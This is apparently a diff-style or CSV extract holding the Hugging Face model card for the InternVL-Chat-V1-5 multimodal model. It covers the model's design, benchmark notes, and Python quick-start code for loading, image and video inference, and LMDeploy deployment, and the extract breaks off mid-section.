|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
OpenGVLab/InternVL-Chat-V1-5,"---
|
| 3 |
+
license: mit
|
| 4 |
+
pipeline_tag: image-text-to-text
|
| 5 |
+
library_name: transformers
|
| 6 |
+
base_model:
|
| 7 |
+
- OpenGVLab/InternViT-6B-448px-V1-5
|
| 8 |
+
- internlm/internlm2-chat-20b
|
| 9 |
+
new_version: OpenGVLab/InternVL2_5-26B
|
| 10 |
+
base_model_relation: merge
|
| 11 |
+
language:
|
| 12 |
+
- multilingual
|
| 13 |
+
tags:
|
| 14 |
+
- internvl
|
| 15 |
+
- custom_code
|
| 16 |
+
---
|
| 17 |
+
|
| 18 |
+
# InternVL-Chat-V1-5
|
| 19 |
+
|
| 20 |
+
[\[📂 GitHub\]](https://github.com/OpenGVLab/InternVL) [\[📜 InternVL 1.0\]](https://huggingface.co/papers/2312.14238) [\[📜 InternVL 1.5\]](https://huggingface.co/papers/2404.16821) [\[📜 Mini-InternVL\]](https://arxiv.org/abs/2410.16261) [\[📜 InternVL 2.5\]](https://huggingface.co/papers/2412.05271)
|
| 21 |
+
|
| 22 |
+
[\[🆕 Blog\]](https://internvl.github.io/blog/) [\[🗨️ Chat Demo\]](https://internvl.opengvlab.com/) [\[🤗 HF Demo\]](https://huggingface.co/spaces/OpenGVLab/InternVL) [\[🚀 Quick Start\]](#quick-start) [\[📖 Documents\]](https://internvl.readthedocs.io/en/latest/)
|
| 23 |
+
|
| 24 |
+
## Introduction
|
| 25 |
+
|
| 26 |
+
<p align=""center"">
|
| 27 |
+
<img src=""https://cdn-uploads.huggingface.co/production/uploads/64119264f0f81eb569e0d569/D60YzQBIzvoCvLRp2gZ0A.jpeg"" alt=""Image Description"" width=""300"" height=""300"">
|
| 28 |
+
</p>
|
| 29 |
+
|
| 30 |
+
> _Two interns holding hands, symbolizing the integration of InternViT and InternLM._
|
| 31 |
+
|
| 32 |
+
We introduce InternVL 1.5, an open-source multimodal large language model (MLLM) to bridge the capability gap between open-source and proprietary commercial models in multimodal understanding.
|
| 33 |
+
|
| 34 |
+
We introduce three simple designs:
|
| 35 |
+
|
| 36 |
+
1. **Strong Vision Encoder:** we explored a continuous learning strategy for the large-scale vision foundation model---InternViT-6B, boosting its visual understanding capabilities, and making it can be transferred and reused in different LLMs.
|
| 37 |
+
2. **Dynamic High-Resolution:** we divide images into tiles ranging from 1 to 40 of 448 × 448 pixels according to the aspect ratio and resolution of the input images, which supports up to 4K resolution input during inference.
|
| 38 |
+
3. **High-Quality Bilingual Dataset:** we carefully collected a high-quality bilingual dataset that covers common scenes, document images, and annotated them with English and Chinese question-answer pairs, significantly enhancing performance in OCR- and Chinese-related tasks.
|
| 39 |
+
|
| 40 |
+
## Model Details
|
| 41 |
+
|
| 42 |
+
- **Model Type:** multimodal large language model (MLLM)
|
| 43 |
+
|
| 44 |
+
- **Model Stats:**
|
| 45 |
+
|
| 46 |
+
- Architecture: [InternViT-6B-448px-V1-5](https://huggingface.co/OpenGVLab/InternViT-6B-448px-V1-5) + MLP + [InternLM2-Chat-20B](https://huggingface.co/internlm/internlm2-chat-20b)
|
| 47 |
+
- Image size: dynamic resolution, max to 40 tiles of 448 x 448 (4K resolution).
|
| 48 |
+
- Params: 25.5B
|
| 49 |
+
|
| 50 |
+
- **Training Strategy:**
|
| 51 |
+
|
| 52 |
+
- Learnable component in the pre-training stage: ViT + MLP
|
| 53 |
+
- Learnable component in the fine-tuning stage: ViT + MLP + LLM
|
| 54 |
+
- For more details on training hyperparameters, please see our [blog](https://internvl.github.io/blog/2024-04-30-InternVL-1.5/).
|
| 55 |
+
|
| 56 |
+
## Architecture
|
| 57 |
+
|
| 58 |
+

|
| 59 |
+
|
| 60 |
+
## Performance
|
| 61 |
+
|
| 62 |
+

|
| 63 |
+
|
| 64 |
+

|
| 65 |
+
|
| 66 |
+
- We simultaneously use [InternVL](https://github.com/OpenGVLab/InternVL) and [VLMEvalKit](https://github.com/open-compass/VLMEvalKit) repositories for model evaluation. Specifically, the results reported for DocVQA, ChartQA, InfoVQA, TextVQA, MME, AI2D, MMBench, CCBench, MMVet, and SEED-Image were tested using the InternVL repository. OCRBench, RealWorldQA, HallBench, and MathVista were evaluated using the VLMEvalKit.
|
| 67 |
+
|
| 68 |
+
Limitations: Although we have made efforts to ensure the safety of the model during the training process and to encourage the model to generate text that complies with ethical and legal requirements, the model may still produce unexpected outputs due to its size and probabilistic generation paradigm. For example, the generated responses may contain biases, discrimination, or other harmful content. Please do not propagate such content. We are not responsible for any consequences resulting from the dissemination of harmful information.
|
| 69 |
+
|
| 70 |
+
## Examples
|
| 71 |
+
|
| 72 |
+

|
| 73 |
+

|
| 74 |
+

|
| 75 |
+

|
| 76 |
+

|
| 77 |
+

|
| 78 |
+
|
| 79 |
+
## Quick Start
|
| 80 |
+
|
| 81 |
+
We provide an example code to run InternVL-Chat-V1-5 using `transformers`.
|
| 82 |
+
|
| 83 |
+
> Please use transformers>=4.37.2 to ensure the model works normally.
|
| 84 |
+
|
| 85 |
+
### Model Loading
|
| 86 |
+
|
| 87 |
+
#### 16-bit (bf16 / fp16)
|
| 88 |
+
|
| 89 |
+
```python
|
| 90 |
+
import torch
|
| 91 |
+
from transformers import AutoTokenizer, AutoModel
|
| 92 |
+
path = ""OpenGVLab/InternVL-Chat-V1-5""
|
| 93 |
+
model = AutoModel.from_pretrained(
|
| 94 |
+
path,
|
| 95 |
+
torch_dtype=torch.bfloat16,
|
| 96 |
+
low_cpu_mem_usage=True,
|
| 97 |
+
use_flash_attn=True,
|
| 98 |
+
trust_remote_code=True).eval().cuda()
|
| 99 |
+
```
|
| 100 |
+
|
| 101 |
+
#### BNB 8-bit Quantization
|
| 102 |
+
|
| 103 |
+
```python
|
| 104 |
+
import torch
|
| 105 |
+
from transformers import AutoTokenizer, AutoModel
|
| 106 |
+
path = ""OpenGVLab/InternVL-Chat-V1-5""
|
| 107 |
+
model = AutoModel.from_pretrained(
|
| 108 |
+
path,
|
| 109 |
+
torch_dtype=torch.bfloat16,
|
| 110 |
+
load_in_8bit=True,
|
| 111 |
+
low_cpu_mem_usage=True,
|
| 112 |
+
use_flash_attn=True,
|
| 113 |
+
trust_remote_code=True).eval()
|
| 114 |
+
```
|
| 115 |
+
|
| 116 |
+
#### BNB 4-bit Quantization
|
| 117 |
+
|
| 118 |
+
> **⚠️ Warning:** Due to significant quantization errors with BNB 4-bit quantization on InternViT-6B, the model may produce nonsensical outputs and fail to understand images. Therefore, please avoid using BNB 4-bit quantization.
|
| 119 |
+
|
| 120 |
+
#### Multiple GPUs
|
| 121 |
+
|
| 122 |
+
The reason for writing the code this way is to avoid errors that occur during multi-GPU inference due to tensors not being on the same device. By ensuring that the first and last layers of the large language model (LLM) are on the same device, we prevent such errors.
|
| 123 |
+
|
| 124 |
+
```python
|
| 125 |
+
import math
|
| 126 |
+
import torch
|
| 127 |
+
from transformers import AutoTokenizer, AutoModel
|
| 128 |
+
|
| 129 |
+
def split_model(model_name):
|
| 130 |
+
device_map = {}
|
| 131 |
+
world_size = torch.cuda.device_count()
|
| 132 |
+
num_layers = {'Mini-InternVL-2B-V1-5': 24, 'Mini-InternVL-4B-V1-5': 32, 'InternVL-Chat-V1-5': 48}[model_name]
|
| 133 |
+
# Since the first GPU will be used for ViT, treat it as half a GPU.
|
| 134 |
+
num_layers_per_gpu = math.ceil(num_layers / (world_size - 0.5))
|
| 135 |
+
num_layers_per_gpu = [num_layers_per_gpu] * world_size
|
| 136 |
+
num_layers_per_gpu[0] = math.ceil(num_layers_per_gpu[0] * 0.5)
|
| 137 |
+
layer_cnt = 0
|
| 138 |
+
for i, num_layer in enumerate(num_layers_per_gpu):
|
| 139 |
+
for j in range(num_layer):
|
| 140 |
+
device_map[f'language_model.model.layers.{layer_cnt}'] = i
|
| 141 |
+
layer_cnt += 1
|
| 142 |
+
device_map['vision_model'] = 0
|
| 143 |
+
device_map['mlp1'] = 0
|
| 144 |
+
device_map['language_model.model.tok_embeddings'] = 0
|
| 145 |
+
device_map['language_model.model.embed_tokens'] = 0
|
| 146 |
+
device_map['language_model.output'] = 0
|
| 147 |
+
device_map['language_model.model.norm'] = 0
|
| 148 |
+
device_map['language_model.model.rotary_emb'] = 0
|
| 149 |
+
device_map['language_model.lm_head'] = 0
|
| 150 |
+
device_map[f'language_model.model.layers.{num_layers - 1}'] = 0
|
| 151 |
+
|
| 152 |
+
return device_map
|
| 153 |
+
|
| 154 |
+
path = ""OpenGVLab/InternVL-Chat-V1-5""
|
| 155 |
+
device_map = split_model('InternVL-Chat-V1-5')
|
| 156 |
+
model = AutoModel.from_pretrained(
|
| 157 |
+
path,
|
| 158 |
+
torch_dtype=torch.bfloat16,
|
| 159 |
+
low_cpu_mem_usage=True,
|
| 160 |
+
use_flash_attn=True,
|
| 161 |
+
trust_remote_code=True,
|
| 162 |
+
device_map=device_map).eval()
|
| 163 |
+
```
|
| 164 |
+
|
| 165 |
+
### Inference with Transformers
|
| 166 |
+
|
| 167 |
+
```python
|
| 168 |
+
import numpy as np
|
| 169 |
+
import torch
|
| 170 |
+
import torchvision.transforms as T
|
| 171 |
+
from decord import VideoReader, cpu
|
| 172 |
+
from PIL import Image
|
| 173 |
+
from torchvision.transforms.functional import InterpolationMode
|
| 174 |
+
from transformers import AutoModel, AutoTokenizer
|
| 175 |
+
|
| 176 |
+
IMAGENET_MEAN = (0.485, 0.456, 0.406)
|
| 177 |
+
IMAGENET_STD = (0.229, 0.224, 0.225)
|
| 178 |
+
|
| 179 |
+
def build_transform(input_size):
|
| 180 |
+
MEAN, STD = IMAGENET_MEAN, IMAGENET_STD
|
| 181 |
+
transform = T.Compose([
|
| 182 |
+
T.Lambda(lambda img: img.convert('RGB') if img.mode != 'RGB' else img),
|
| 183 |
+
T.Resize((input_size, input_size), interpolation=InterpolationMode.BICUBIC),
|
| 184 |
+
T.ToTensor(),
|
| 185 |
+
T.Normalize(mean=MEAN, std=STD)
|
| 186 |
+
])
|
| 187 |
+
return transform
|
| 188 |
+
|
| 189 |
+
def find_closest_aspect_ratio(aspect_ratio, target_ratios, width, height, image_size):
|
| 190 |
+
best_ratio_diff = float('inf')
|
| 191 |
+
best_ratio = (1, 1)
|
| 192 |
+
area = width * height
|
| 193 |
+
for ratio in target_ratios:
|
| 194 |
+
target_aspect_ratio = ratio[0] / ratio[1]
|
| 195 |
+
ratio_diff = abs(aspect_ratio - target_aspect_ratio)
|
| 196 |
+
if ratio_diff < best_ratio_diff:
|
| 197 |
+
best_ratio_diff = ratio_diff
|
| 198 |
+
best_ratio = ratio
|
| 199 |
+
elif ratio_diff == best_ratio_diff:
|
| 200 |
+
if area > 0.5 * image_size * image_size * ratio[0] * ratio[1]:
|
| 201 |
+
best_ratio = ratio
|
| 202 |
+
return best_ratio
|
| 203 |
+
|
| 204 |
+
def dynamic_preprocess(image, min_num=1, max_num=12, image_size=448, use_thumbnail=False):
|
| 205 |
+
orig_width, orig_height = image.size
|
| 206 |
+
aspect_ratio = orig_width / orig_height
|
| 207 |
+
|
| 208 |
+
# calculate the existing image aspect ratio
|
| 209 |
+
target_ratios = set(
|
| 210 |
+
(i, j) for n in range(min_num, max_num + 1) for i in range(1, n + 1) for j in range(1, n + 1) if
|
| 211 |
+
i * j <= max_num and i * j >= min_num)
|
| 212 |
+
target_ratios = sorted(target_ratios, key=lambda x: x[0] * x[1])
|
| 213 |
+
|
| 214 |
+
# find the closest aspect ratio to the target
|
| 215 |
+
target_aspect_ratio = find_closest_aspect_ratio(
|
| 216 |
+
aspect_ratio, target_ratios, orig_width, orig_height, image_size)
|
| 217 |
+
|
| 218 |
+
# calculate the target width and height
|
| 219 |
+
target_width = image_size * target_aspect_ratio[0]
|
| 220 |
+
target_height = image_size * target_aspect_ratio[1]
|
| 221 |
+
blocks = target_aspect_ratio[0] * target_aspect_ratio[1]
|
| 222 |
+
|
| 223 |
+
# resize the image
|
| 224 |
+
resized_img = image.resize((target_width, target_height))
|
| 225 |
+
processed_images = []
|
| 226 |
+
for i in range(blocks):
|
| 227 |
+
box = (
|
| 228 |
+
(i % (target_width // image_size)) * image_size,
|
| 229 |
+
(i // (target_width // image_size)) * image_size,
|
| 230 |
+
((i % (target_width // image_size)) + 1) * image_size,
|
| 231 |
+
((i // (target_width // image_size)) + 1) * image_size
|
| 232 |
+
)
|
| 233 |
+
# split the image
|
| 234 |
+
split_img = resized_img.crop(box)
|
| 235 |
+
processed_images.append(split_img)
|
| 236 |
+
assert len(processed_images) == blocks
|
| 237 |
+
if use_thumbnail and len(processed_images) != 1:
|
| 238 |
+
thumbnail_img = image.resize((image_size, image_size))
|
| 239 |
+
processed_images.append(thumbnail_img)
|
| 240 |
+
return processed_images
|
| 241 |
+
|
| 242 |
+
def load_image(image_file, input_size=448, max_num=12):
|
| 243 |
+
image = Image.open(image_file).convert('RGB')
|
| 244 |
+
transform = build_transform(input_size=input_size)
|
| 245 |
+
images = dynamic_preprocess(image, image_size=input_size, use_thumbnail=True, max_num=max_num)
|
| 246 |
+
pixel_values = [transform(image) for image in images]
|
| 247 |
+
pixel_values = torch.stack(pixel_values)
|
| 248 |
+
return pixel_values
|
| 249 |
+
|
| 250 |
+
# If you have an 80G A100 GPU, you can put the entire model on a single GPU.
|
| 251 |
+
# Otherwise, you need to load a model using multiple GPUs, please refer to the `Multiple GPUs` section.
|
| 252 |
+
path = 'OpenGVLab/InternVL-Chat-V1-5'
|
| 253 |
+
model = AutoModel.from_pretrained(
|
| 254 |
+
path,
|
| 255 |
+
torch_dtype=torch.bfloat16,
|
| 256 |
+
low_cpu_mem_usage=True,
|
| 257 |
+
use_flash_attn=True,
|
| 258 |
+
trust_remote_code=True).eval().cuda()
|
| 259 |
+
tokenizer = AutoTokenizer.from_pretrained(path, trust_remote_code=True, use_fast=False)
|
| 260 |
+
|
| 261 |
+
# set the max number of tiles in `max_num`
|
| 262 |
+
pixel_values = load_image('./examples/image1.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 263 |
+
generation_config = dict(max_new_tokens=1024, do_sample=True)
|
| 264 |
+
|
| 265 |
+
# pure-text conversation (纯文本对话)
|
| 266 |
+
question = 'Hello, who are you?'
|
| 267 |
+
response, history = model.chat(tokenizer, None, question, generation_config, history=None, return_history=True)
|
| 268 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 269 |
+
|
| 270 |
+
question = 'Can you tell me a story?'
|
| 271 |
+
response, history = model.chat(tokenizer, None, question, generation_config, history=history, return_history=True)
|
| 272 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 273 |
+
|
| 274 |
+
# single-image single-round conversation (单图单轮对话)
|
| 275 |
+
question = '<image>\nPlease describe the image shortly.'
|
| 276 |
+
response = model.chat(tokenizer, pixel_values, question, generation_config)
|
| 277 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 278 |
+
|
| 279 |
+
# single-image multi-round conversation (单图多轮对话)
|
| 280 |
+
question = '<image>\nPlease describe the image in detail.'
|
| 281 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config, history=None, return_history=True)
|
| 282 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 283 |
+
|
| 284 |
+
question = 'Please write a poem according to the image.'
|
| 285 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config, history=history, return_history=True)
|
| 286 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 287 |
+
|
| 288 |
+
# multi-image multi-round conversation, combined images (多图多轮对话,拼接图像)
|
| 289 |
+
pixel_values1 = load_image('./examples/image1.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 290 |
+
pixel_values2 = load_image('./examples/image2.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 291 |
+
pixel_values = torch.cat((pixel_values1, pixel_values2), dim=0)
|
| 292 |
+
|
| 293 |
+
question = '<image>\nDescribe the two images in detail.'
|
| 294 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
|
| 295 |
+
history=None, return_history=True)
|
| 296 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 297 |
+
|
| 298 |
+
question = 'What are the similarities and differences between these two images.'
|
| 299 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
|
| 300 |
+
history=history, return_history=True)
|
| 301 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 302 |
+
|
| 303 |
+
# multi-image multi-round conversation, separate images (多图多轮对话,独立图像)
|
| 304 |
+
pixel_values1 = load_image('./examples/image1.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 305 |
+
pixel_values2 = load_image('./examples/image2.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 306 |
+
pixel_values = torch.cat((pixel_values1, pixel_values2), dim=0)
|
| 307 |
+
num_patches_list = [pixel_values1.size(0), pixel_values2.size(0)]
|
| 308 |
+
|
| 309 |
+
question = 'Image-1: <image>\nImage-2: <image>\nDescribe the two images in detail.'
|
| 310 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
|
| 311 |
+
num_patches_list=num_patches_list,
|
| 312 |
+
history=None, return_history=True)
|
| 313 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 314 |
+
|
| 315 |
+
question = 'What are the similarities and differences between these two images.'
|
| 316 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
|
| 317 |
+
num_patches_list=num_patches_list,
|
| 318 |
+
history=history, return_history=True)
|
| 319 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 320 |
+
|
| 321 |
+
# batch inference, single image per sample (单图批处理)
|
| 322 |
+
pixel_values1 = load_image('./examples/image1.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 323 |
+
pixel_values2 = load_image('./examples/image2.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 324 |
+
num_patches_list = [pixel_values1.size(0), pixel_values2.size(0)]
|
| 325 |
+
pixel_values = torch.cat((pixel_values1, pixel_values2), dim=0)
|
| 326 |
+
|
| 327 |
+
questions = ['<image>\nDescribe the image in detail.'] * len(num_patches_list)
|
| 328 |
+
responses = model.batch_chat(tokenizer, pixel_values,
|
| 329 |
+
num_patches_list=num_patches_list,
|
| 330 |
+
questions=questions,
|
| 331 |
+
generation_config=generation_config)
|
| 332 |
+
for question, response in zip(questions, responses):
|
| 333 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 334 |
+
|
| 335 |
+
# video multi-round conversation (视频多轮对话)
|
| 336 |
+
def get_index(bound, fps, max_frame, first_idx=0, num_segments=32):
|
| 337 |
+
if bound:
|
| 338 |
+
start, end = bound[0], bound[1]
|
| 339 |
+
else:
|
| 340 |
+
start, end = -100000, 100000
|
| 341 |
+
start_idx = max(first_idx, round(start * fps))
|
| 342 |
+
end_idx = min(round(end * fps), max_frame)
|
| 343 |
+
seg_size = float(end_idx - start_idx) / num_segments
|
| 344 |
+
frame_indices = np.array([
|
| 345 |
+
int(start_idx + (seg_size / 2) + np.round(seg_size * idx))
|
| 346 |
+
for idx in range(num_segments)
|
| 347 |
+
])
|
| 348 |
+
return frame_indices
|
| 349 |
+
|
| 350 |
+
def load_video(video_path, bound=None, input_size=448, max_num=1, num_segments=32):
|
| 351 |
+
vr = VideoReader(video_path, ctx=cpu(0), num_threads=1)
|
| 352 |
+
max_frame = len(vr) - 1
|
| 353 |
+
fps = float(vr.get_avg_fps())
|
| 354 |
+
|
| 355 |
+
pixel_values_list, num_patches_list = [], []
|
| 356 |
+
transform = build_transform(input_size=input_size)
|
| 357 |
+
frame_indices = get_index(bound, fps, max_frame, first_idx=0, num_segments=num_segments)
|
| 358 |
+
for frame_index in frame_indices:
|
| 359 |
+
img = Image.fromarray(vr[frame_index].asnumpy()).convert('RGB')
|
| 360 |
+
img = dynamic_preprocess(img, image_size=input_size, use_thumbnail=True, max_num=max_num)
|
| 361 |
+
pixel_values = [transform(tile) for tile in img]
|
| 362 |
+
pixel_values = torch.stack(pixel_values)
|
| 363 |
+
num_patches_list.append(pixel_values.shape[0])
|
| 364 |
+
pixel_values_list.append(pixel_values)
|
| 365 |
+
pixel_values = torch.cat(pixel_values_list)
|
| 366 |
+
return pixel_values, num_patches_list
|
| 367 |
+
|
| 368 |
+
video_path = './examples/red-panda.mp4'
|
| 369 |
+
pixel_values, num_patches_list = load_video(video_path, num_segments=8, max_num=1)
|
| 370 |
+
pixel_values = pixel_values.to(torch.bfloat16).cuda()
|
| 371 |
+
video_prefix = ''.join([f'Frame{i+1}: <image>\n' for i in range(len(num_patches_list))])
|
| 372 |
+
question = video_prefix + 'What is the red panda doing?'
|
| 373 |
+
# Frame1: <image>\nFrame2: <image>\n...\nFrame8: <image>\n{question}
|
| 374 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
|
| 375 |
+
num_patches_list=num_patches_list, history=None, return_history=True)
|
| 376 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 377 |
+
|
| 378 |
+
question = 'Describe this video in detail.'
|
| 379 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
|
| 380 |
+
num_patches_list=num_patches_list, history=history, return_history=True)
|
| 381 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 382 |
+
```
|
| 383 |
+
|
| 384 |
+
#### Streaming Output
|
| 385 |
+
|
| 386 |
+
Besides this method, you can also use the following code to get streamed output.
|
| 387 |
+
|
| 388 |
+
```python
|
| 389 |
+
from transformers import TextIteratorStreamer
|
| 390 |
+
from threading import Thread
|
| 391 |
+
|
| 392 |
+
# Initialize the streamer
|
| 393 |
+
streamer = TextIteratorStreamer(tokenizer, skip_prompt=True, skip_special_tokens=True, timeout=10)
|
| 394 |
+
# Define the generation configuration
|
| 395 |
+
generation_config = dict(max_new_tokens=1024, do_sample=False, streamer=streamer)
|
| 396 |
+
# Start the model chat in a separate thread
|
| 397 |
+
thread = Thread(target=model.chat, kwargs=dict(
|
| 398 |
+
tokenizer=tokenizer, pixel_values=pixel_values, question=question,
|
| 399 |
+
history=None, return_history=False, generation_config=generation_config,
|
| 400 |
+
))
|
| 401 |
+
thread.start()
|
| 402 |
+
|
| 403 |
+
# Initialize an empty string to store the generated text
|
| 404 |
+
generated_text = ''
|
| 405 |
+
# Loop through the streamer to get the new text as it is generated
|
| 406 |
+
for new_text in streamer:
|
| 407 |
+
if new_text == model.conv_template.sep:
|
| 408 |
+
break
|
| 409 |
+
generated_text += new_text
|
| 410 |
+
print(new_text, end='', flush=True) # Print each new chunk of generated text on the same line
|
| 411 |
+
```
|
| 412 |
+
|
| 413 |
+
## Finetune
|
| 414 |
+
|
| 415 |
+
Many repositories now support fine-tuning of the InternVL series models, including [InternVL](https://github.com/OpenGVLab/InternVL), [SWIFT](https://github.com/modelscope/ms-swift), [XTurner](https://github.com/InternLM/xtuner), and others. Please refer to their documentation for more details on fine-tuning.
|
| 416 |
+
|
| 417 |
+
## Deployment
|
| 418 |
+
|
| 419 |
+
### LMDeploy
|
| 420 |
+
|
| 421 |
+
LMDeploy is a toolkit for compressing, deploying, and serving LLMs & VLMs.
|
| 422 |
+
|
| 423 |
+
```sh
|
| 424 |
+
pip install lmdeploy>=0.5.3
|
| 425 |
+
```
|
| 426 |
+
|
| 427 |
+
LMDeploy abstracts the complex inference process of multi-modal Vision-Language Models (VLM) into an easy-to-use pipeline, similar to the Large Language Model (LLM) inference pipeline.
|
| 428 |
+
|
| 429 |
+
#### A 'Hello, world' Example
|
| 430 |
+
|
| 431 |
+
```python
|
| 432 |
+
from lmdeploy import pipeline, TurbomindEngineConfig
|
| 433 |
+
from lmdeploy.vl import load_image
|
| 434 |
+
|
| 435 |
+
model = 'OpenGVLab/InternVL-Chat-V1-5'
|
| 436 |
+
image = load_image('https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/tests/data/tiger.jpeg')
|
| 437 |
+
pipe = pipeline(model, backend_config=TurbomindEngineConfig(session_len=8192))
|
| 438 |
+
response = pipe(('describe this image', image))
|
| 439 |
+
print(response.text)
|
| 440 |
+
```
|
| 441 |
+
|
| 442 |
+
If `ImportError` occurs while executing this case, please install the required dependency packages as prompted.
|
| 443 |
+
|
| 444 |
+
#### Multi-images Inference
|
| 445 |
+
|
| 446 |
+
When dealing with multiple images, you can put them all in one list. Keep in mind that multiple images will lead to a higher number of input tokens, and as a result, the size of the context window typically needs to be increased.
|
| 447 |
+
|
| 448 |
+
> Warning: Due to the scarcity of multi-image conversation data, the performance on multi-image tasks may be unstable, and it may require multiple attempts to achieve satisfactory results.
|
| 449 |
+
|
| 450 |
+
```python
|
| 451 |
+
from lmdeploy import pipeline, TurbomindEngineConfig
|
| 452 |
+
from lmdeploy.vl import load_image
|
| 453 |
+
from lmdeploy.vl.constants import IMAGE_TOKEN
|
| 454 |
+
|
| 455 |
+
model = 'OpenGVLab/InternVL-Chat-V1-5'
|
| 456 |
+
pipe = pipeline(model, backend_config=TurbomindEngineConfig(session_len=8192))
|
| 457 |
+
|
| 458 |
+
image_urls=[
|
| 459 |
+
'https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/demo/resources/human-pose.jpg',
|
| 460 |
+
'https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/demo/resources/det.jpg'
|
| 461 |
+
]
|
| 462 |
+
|
| 463 |
+
images = [load_image(img_url) for img_url in image_urls]
|
| 464 |
+
# Numbering images improves multi-image conversations
|
| 465 |
+
response = pipe((f'Image-1: {IMAGE_TOKEN}\nImage-2: {IMAGE_TOKEN}\ndescribe these two images', images))
|
| 466 |
+
print(response.text)
|
| 467 |
+
```
|
| 468 |
+
|
| 469 |
+
#### Batch Prompts Inference
|
| 470 |
+
|
| 471 |
+
Conducting inference with batch prompts is quite straightforward; just place them within a list structure:
|
| 472 |
+
|
| 473 |
+
```python
|
| 474 |
+
from lmdeploy import pipeline, TurbomindEngineConfig
|
| 475 |
+
from lmdeploy.vl import load_image
|
| 476 |
+
|
| 477 |
+
model = 'OpenGVLab/InternVL-Chat-V1-5'
|
| 478 |
+
pipe = pipeline(model, backend_config=TurbomindEngineConfig(session_len=8192))
|
| 479 |
+
|
| 480 |
+
image_urls=[
|
| 481 |
+
""https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/demo/resources/human-pose.jpg"",
|
| 482 |
+
""https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/demo/resources/det.jpg""
|
| 483 |
+
]
|
| 484 |
+
prompts = [('describe this image', load_image(img_url)) for img_url in image_urls]
|
| 485 |
+
response = pipe(prompts)
|
| 486 |
+
print(response)
|
| 487 |
+
```
|
| 488 |
+
|
| 489 |
+
#### Multi-turn Conversation
|
| 490 |
+
|
| 491 |
+
There are two ways to do the multi-turn conversations with the pipeline. One is to construct messages according to the format of OpenAI and use above introduced method, the other is to use the `pipeline.chat` interface.
|
| 492 |
+
|
| 493 |
+
```python
|
| 494 |
+
from lmdeploy import pipeline, TurbomindEngineConfig, GenerationConfig
|
| 495 |
+
from lmdeploy.vl import load_image
|
| 496 |
+
|
| 497 |
+
model = 'OpenGVLab/InternVL-Chat-V1-5'
|
| 498 |
+
pipe = pipeline(model, backend_config=TurbomindEngineConfig(session_len=8192))
|
| 499 |
+
|
| 500 |
+
image = load_image('https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/demo/resources/human-pose.jpg')
|
| 501 |
+
gen_config = GenerationConfig(top_k=40, top_p=0.8, temperature=0.8)
|
| 502 |
+
sess = pipe.chat(('describe this image', image), gen_config=gen_config)
|
| 503 |
+
print(sess.response.text)
|
| 504 |
+
sess = pipe.chat('What is the woman doing?', session=sess, gen_config=gen_config)
|
| 505 |
+
print(sess.response.text)
|
| 506 |
+
```
|
| 507 |
+
|
| 508 |
+
#### Service
|
| 509 |
+
|
| 510 |
+
LMDeploy's `api_server` enables models to be easily packed into services with a single command. The provided RESTful APIs are compatible with OpenAI's interfaces. Below are an example of service startup:
|
| 511 |
+
|
| 512 |
+
```shell
|
| 513 |
+
